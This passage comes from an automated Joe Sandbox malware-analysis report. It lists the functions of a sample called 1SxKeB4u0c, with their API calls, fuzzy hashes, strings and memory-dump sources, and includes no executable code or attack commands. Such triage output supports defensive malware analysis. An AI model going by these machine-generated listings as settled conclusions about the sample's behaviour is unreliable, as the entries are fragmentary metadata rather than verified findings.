                                                                              • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                              • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                              • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                              Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                              • _memmove.LIBCMT ref: 00466C09
                                                                              • _memset.LIBCMT ref: 00466C16
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                              • String ID:
                                                                              • API String ID: 48991266-0
                                                                              • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                              • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                              • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                              • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                              Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 00402231
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                              • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                              • GetStockObject.GDI32(00000005), ref: 00402258
                                                                              • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 1946975507-0
                                                                              • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                              • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                              • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                              • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                              Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              • String ID:
                                                                              • API String ID: 3974789173-0
                                                                              • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                              • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                              • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                              • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                              Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %I
                                                                              • API String ID: 0-63094095
                                                                              • Opcode ID: bceaa088faf8b79c40e3b3fb6df2ffba80340295d052be8b077f682f6d29ec08
                                                                              • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                                              • Opcode Fuzzy Hash: bceaa088faf8b79c40e3b3fb6df2ffba80340295d052be8b077f682f6d29ec08
                                                                              • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                                              Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __itow_s
                                                                              • String ID: xbL$xbL
                                                                              • API String ID: 3653519197-3351732020
                                                                              • Opcode ID: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                              • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                                              • Opcode Fuzzy Hash: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                              • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                                              Function 02F4FAF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: pow
                                                                              • API String ID: 0-2276729525
                                                                              • Opcode ID: a805a147513e6a9f65bc8f26a1689b258f9f61c2c1b0a9b6ecee4a5f729cae06
                                                                              • Instruction ID: 308e45947604bdf9c8477df7001870c79961199963d45950466bfba2fcf14a5e
                                                                              • Opcode Fuzzy Hash: a805a147513e6a9f65bc8f26a1689b258f9f61c2c1b0a9b6ecee4a5f729cae06
                                                                              • Instruction Fuzzy Hash: C3517A61E0810696DB117B14CD4037B7FA4DF40BC4F208E68EFDE86A98EFB595D5CA42
                                                                              Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                              • String ID: LPT
                                                                              • API String ID: 3222508074-1350329615
                                                                              • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                              • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                              • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                              • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                              Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00412968
                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                              • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                              • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                              • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                              Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID: DdL$DdL
                                                                              • API String ID: 1473721057-91670653
                                                                              • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                              • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                                              • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                              • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                                              Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0047259E
                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset
                                                                              • String ID: |
                                                                              • API String ID: 1413715105-2343686810
                                                                              • Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                              • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                                              • Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                              • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                                              Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DestroyMove
                                                                              • String ID: static
                                                                              • API String ID: 2139405536-2160076837
                                                                              • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                              • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                                              • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                              • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                                              Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00462911
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: c197747bc3b685acedd0e32849f7889b420d0f2a5673a073dabb367738ae49aa
                                                                              • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                                              • Opcode Fuzzy Hash: c197747bc3b685acedd0e32849f7889b420d0f2a5673a073dabb367738ae49aa
                                                                              • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                                              Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                              • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                                              • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                              • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                                              Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                              • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                              • String ID: static
                                                                              • API String ID: 1983116058-2160076837
                                                                              • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                              • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                                              • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                              • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                                              Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
